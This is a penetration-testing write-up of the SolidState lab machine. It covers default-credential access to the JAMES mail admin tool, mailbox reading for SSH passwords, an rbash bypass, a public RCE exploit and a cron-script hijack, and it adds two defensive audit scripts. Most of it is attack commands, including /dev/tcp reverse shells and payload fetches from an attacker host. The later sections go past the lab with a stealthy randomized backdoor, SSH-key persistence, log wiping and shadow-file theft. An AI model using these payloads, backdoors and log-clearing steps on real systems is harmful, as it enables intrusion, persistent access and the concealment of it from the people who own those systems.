## Machine Synopsis

Key Exploitation Techniques:

- JAMES Remote Administration Tool default credentials exploitation
- Email server user enumeration and password manipulation
- Email content analysis for SSH credential discovery
- Restricted shell bypass via SSH command execution
- Cronjob exploitation through writable script overwrite
## Reconnaissance & Enumeration

### Port Discovery

```
$ nmap -sC -sV -A -p- 10.10.10.51
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings:
|   GenericLines:
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for
|_    Login id:
```

Key Services:

- JAMES Mail Server (SMTP, POP3, NNTP)
- JAMES Remote Administration Tool (port 4555)
- Apache web server
### Web Application Analysis

The website is the "Solid State Security" company page, with minimal functionality and no obvious attack vectors.

```
# Directory enumeration yields no significant results
$ gobuster dir -u http://10.10.10.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
## Exploitation

### JAMES Administration Tool Access

#### Default Credential Testing

```
# Connect to JAMES Remote Administration Tool
$ nc -v 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
```

Success: the default credentials root:root provide administrative access.
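The root cause above is a remote administration service left on its shipped credentials and reachable from the network. The following audit script is an added example written for this writeup, not code from the machine or from Apache James; it checks a James-style `config.xml` for a weak administrator account and for a `<remotemanager>` listener that is not bound to loopback. The XML fragments are constructed, and the `<remotemanager>`/`<bind>`/`<administrator_accounts>` layout is assumed to match James 2.3.x rather than copied from the target.

```python
import xml.etree.ElementTree as ET

# Constructed fragments modelled on the <remotemanager> block of a James 2.3.x
# config.xml (element names are an assumption, not copied from the target host).
DEFAULT_CONFIG = """<config>
  <remotemanager enabled="true">
    <port>4555</port>
    <administrator_accounts>
      <account login="root" password="root"/>
    </administrator_accounts>
  </remotemanager>
</config>"""

HARDENED_CONFIG = """<config>
  <remotemanager enabled="true">
    <port>4555</port>
    <bind>127.0.0.1</bind>
    <administrator_accounts>
      <account login="mailops" password="Kq7!vR2p#Lm9xT4w"/>
    </administrator_accounts>
  </remotemanager>
</config>"""

# Passwords that should never guard an administrative interface.
WEAK_PASSWORDS = {"", "root", "admin", "password", "james"}

def audit_remotemanager(xml_text):
    """Return a list of findings for the remote administration service."""
    rm = ET.fromstring(xml_text).find("remotemanager")
    findings = []
    if rm is None or rm.get("enabled", "true").lower() != "true":
        return findings  # service disabled: nothing listens on 4555
    bind = (rm.findtext("bind") or "").strip()
    if bind in ("", "0.0.0.0"):
        findings.append("remotemanager reachable on all interfaces (no <bind>)")
    for acct in rm.iter("account"):
        login = acct.get("login", "")
        pw = acct.get("password", "")
        # Flag login==password, dictionary defaults, and anything short.
        if pw == login or pw.lower() in WEAK_PASSWORDS or len(pw) < 12:
            findings.append(f"weak administrator credential for login '{login}'")
    return findings

if __name__ == "__main__":
    for name, cfg in (("default", DEFAULT_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_remotemanager(cfg) or ["no findings"])
```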
#### User Enumeration and Password Reset

```
# List existing mail accounts
HELP
Currently implemented commands:
help                                display this help
listusers                           display existing accounts
countusers                          display the number of existing accounts
adduser [username] [password]       add a new user
verify [username]                   verify if specified user exist
deluser [username]                  delete existing user
setpassword [username] [password]   sets a user's password
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
# Reset all user passwords to 'password'
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset
```
### Email Content Analysis

#### POP3 Access and Email Retrieval

```
# Access john's mailbox
$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS password
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access

John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James
.
QUIT
```
#### Credential Discovery in mindy's Mailbox

```
# Access mindy's mailbox
$ telnet 10.10.10.51 110
USER mindy
+OK
PASS password
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
.
```

SSH Credentials: mindy:P@55W0rd1!2@
### SSH Access and Restricted Shell Bypass

#### Initial SSH Connection

```
$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: P@55W0rd1!2@
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ id
-rbash: id: command not found
```

Restriction: the user lands in a restricted bash shell (rbash).
#### Restricted Shell Bypass

Method 1: SSH Command Execution

```
# Execute commands directly via SSH
$ ssh mindy@10.10.10.51 -t "bash --noprofile"
mindy@10.10.10.51's password: P@55W0rd1!2@
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
```

Method 2: Apache James RCE (Alternative)

```
# Using searchsploit for Apache James exploit
$ searchsploit Apache James Server 2.3.2
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
# Download and modify exploit
$ searchsploit -m 35513
$ python 35513.py 10.10.10.51
# Setup netcat listener
$ nc -nlvp 1234
# Payload executes the next time a user logs in
# Triggers reverse shell as mindy
# Reverse shell received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 48670
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75
```
## Privilege Escalation

### System Enumeration

```
# Transfer LinPEAS for enumeration
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./linpeas.sh
```

### Cronjob Discovery

```
# LinPEAS reveals interesting file in /opt
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Apr 26  2021 ..
drwxr-xr-x 11 root root 4096 Apr 26  2021 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
```

Key Finding: /opt/tmp.py is world-writable (mode 777, owned by root) and appears to be executed periodically.
### Process Monitoring

```
# Transfer and run pspy for process monitoring
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32
# Process execution observed
2022/05/09 04:03:01 CMD: UID=0 PID=1716 | /bin/sh -c python /opt/tmp.py
2022/05/09 04:03:01 CMD: UID=0 PID=1717 | python /opt/tmp.py
```

Confirmation: /opt/tmp.py is executed by root (UID=0) via a cronjob.
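What makes /opt/tmp.py exploitable is the combination of a root cron entry and a script that any user can modify. The audit below is an added example for this writeup, not code from the machine: it parses system-crontab lines, pulls out the absolute paths each job runs, and reports any that carry group or world write bits. The crontab text and the two fixture scripts are constructed (the machine's actual cron entry is not shown in the writeup, so `*/3 * * * * root python ...` is an assumed schedule).

```python
import os
import re
import stat
import tempfile

# A system crontab line: five schedule fields, the run-as user, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def script_paths(cmd):
    # Absolute paths named in the command, e.g. /opt/tmp.py in "python /opt/tmp.py".
    return [tok for tok in cmd.split() if tok.startswith("/")]

def writable_by_non_owner(path):
    """True when the group or world write bit is set (the /opt/tmp.py case)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text):
    """Return (user, path) pairs where a cron job runs a file others can modify."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank line or comment
        m = CRON_LINE.match(line)
        if not m:
            continue  # e.g. SHELL=/bin/sh variable assignments
        for path in script_paths(m.group("cmd")):
            if os.path.isfile(path) and writable_by_non_owner(path):
                findings.append((m.group("user"), path))
    return findings

def demo():
    """Constructed fixture: one 0777 script and one 0755 script, both run by root."""
    d = tempfile.mkdtemp()
    loose = os.path.join(d, "tmp.py")
    tight = os.path.join(d, "backup.sh")
    for p, mode in ((loose, 0o777), (tight, 0o755)):
        with open(p, "w") as f:
            f.write("#!/usr/bin/env python\n")
        os.chmod(p, mode)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/3 * * * * root python {loose}\n"
        f"0 2 * * * root {tight}\n"
    )
    return audit_crontab(crontab), loose, tight

if __name__ == "__main__":
    print(demo()[0])  # only the world-writable tmp.py fixture is reported
```

Pointing `audit_crontab` at the contents of /etc/crontab and /etc/cron.d/* on a real host gives the same check LinPEAS hinted at, without relying on a third-party script.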
### Cronjob Exploitation

#### Payload Creation and Deployment

```
# Create Python reverse shell payload
$ cat > py_revshell << 'EOF'
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
EOF
# Host payload
$ python3 -m http.server 80
# Append payload to tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ curl http://10.10.14.8/py_revshell >> tmp.py
# Verify modification
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
```
#### Root Shell Acquisition

```
# Setup netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
# Wait for cronjob execution
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 40852
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
b4c9723a28899b1c45db281d99cc87c9
```
## Post-Exploitation Techniques

### Persistence Methods

#### SSH Key Persistence

```
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f solidstate_persistence
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
```
#### JAMES Mail Server Backdoor

```
# Create mail account for persistence
# echo "adduser backdoor password123" | nc 10.10.10.51 4555
# Modify mail templates for code execution
# cat > /root/apps/james/SAR-INF/config.xml << 'EOF'
# [Include malicious mail processing rules]
# EOF
```
#### Cron Backdoor Maintenance

```
# Create more sophisticated backdoor
# cat > /opt/system_check.py << 'EOF'
#!/usr/bin/env python
import subprocess
import time
import socket

def check_connection():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(("10.10.14.8", 4444))
        subprocess.call(["/bin/bash", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
        s.close()
    except:
        pass

check_connection()
EOF
# Add to crontab
# echo "*/10 * * * * /usr/bin/python /opt/system_check.py" >> /etc/crontab
```
### Defense Evasion

#### Mail Server Log Cleanup

```
# Clear JAMES mail logs
# > /root/apps/james/logs/mailet.log
# > /root/apps/james/logs/james.log
# Clear system mail logs
# > /var/log/mail.log
# > /var/log/mail.err
```
#### Process Hiding

```
# Modify cronjob execution to be less obvious
# cat > /opt/tmp.py << 'EOF'
#!/usr/bin/env python
import os
import sys
import time
import random

# Original cleanup function
try:
    os.system('rm -r /tmp/* ')
except:
    pass

# Hidden backdoor with random delay
time.sleep(random.randint(1, 30))
if random.randint(1, 10) == 5:  # Execute 10% of the time
    os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1' &")
sys.exit()
EOF
```
### Lateral Movement Preparation

#### Email Server Exploitation

```
# Enumerate all mail accounts and passwords
# Connect to JAMES admin tool and extract user list
# Access all mailboxes for credential discovery
# Search for additional systems and credentials in emails
```

#### Network Discovery

```
# Discover email-related infrastructure
# ss -tlnp | grep -E "(25|110|143|993|995)"
# Scan for internal mail servers
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done
```

#### Credential Harvesting

```
# Extract mail database if present
# find /root/apps/james -name "*.db" -exec cp {} /tmp/ \;
# Search mail content for credentials
# grep -r "password\|pass\|credential" /root/apps/james/var/mail/
# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup
```
## Alternative Exploitation Methods

### Direct JAMES Exploitation

```
# Alternative Apache James RCE exploit
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
# Trigger by SSH login as any user
$ ssh mindy@10.10.10.51
```

### SMTP Enumeration

```
# SMTP user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
# SMTP relay testing
$ swaks --to test@10.10.10.51 --from test@attacker.com --server 10.10.10.51
```
## Alternative Privilege Escalation

### Kernel Exploitation

```
# Check kernel version
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
# Search for applicable exploits
$ searchsploit linux kernel 4.9 | grep -i privilege
```

### SUID Binary Analysis

```
# Find SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -4000 -type f 2>/dev/null
# Check for custom SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /usr/local/bin/
```